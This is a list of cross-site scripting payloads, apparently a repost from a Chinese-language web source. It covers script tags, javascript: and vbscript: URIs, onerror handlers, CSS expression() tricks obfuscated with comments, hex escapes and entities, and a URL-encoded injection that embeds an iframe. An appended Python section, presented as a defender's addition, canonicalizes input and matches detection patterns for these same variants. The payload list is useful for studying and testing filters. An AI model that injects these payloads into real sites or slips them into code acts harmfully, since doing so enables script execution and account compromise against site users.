<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (? = whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078pression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
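A defender's view of the list above, as an added example that is not part of the original post: a filter that matches the raw text misses most of these variants, so this Python example canonicalizes the input (URL encoding, HTML entities, CSS escapes, comments, case, control whitespace) before matching. The function names, rule names and samples are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?")  # CSS \HHHH escapes
COMMENT = re.compile(r"/\*.*?\*/", re.S)                      # /* */ used as a splitter
CONTROL_WS = re.compile(r"[\x00-\x20]+")                      # tabs, newlines, NULs

# Matched against the whitespace-free form, so "java<TAB>script:" still hits.
COMPACT_RULES = {
    "script-tag": re.compile(r"<script"),
    "script-uri": re.compile(r"(?:javascript|vbscript):"),
    "css-expression": re.compile(r"expression\("),
}
# Matched before whitespace removal so that "content=" is not read as a handler.
HANDLER = re.compile(r"(?<![a-z0-9])on[a-z]+\s*=")

def _css_char(match):
    """Turn one CSS hex escape into the character it stands for."""
    cp = int(match.group(1), 16)
    return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"

def canonicalize(value):
    """Undo the encodings a browser would undo before interpreting the markup."""
    value = html.unescape(unquote(value))
    value = CSS_ESCAPE.sub(_css_char, value)
    return COMMENT.sub("", value).lower()

def classify(value):
    """Return the names of the rules that match the canonical form of value."""
    canon = canonicalize(value)
    compact = CONTROL_WS.sub("", canon)
    hits = {name for name, rx in COMPACT_RULES.items() if rx.search(compact)}
    if HANDLER.search(canon):
        hits.add("event-handler")
    return hits

# Constructed samples, one per obfuscation style in the list above, plus a benign tag.
SAMPLES = [
    '<img src="java\tscript:alert(1)">',
    '<img src="#"/* */onerror=alert(1)>',
    '<div style={left:exp/* */ression (alert(1))}>',
    r'<div style={left:\0065\0078pression (alert(1))}>',
    '<div style={left:&#x0065;xpression (alert(1))}>',
    '%3Cscript%3Ealert(1)%3C/script%3E',
    '<meta name="description" content="Lesson one">',
]
```

This is suited to triaging logged input; contextual output encoding and allowlist-based sanitization remain the controls that stop the markup from executing.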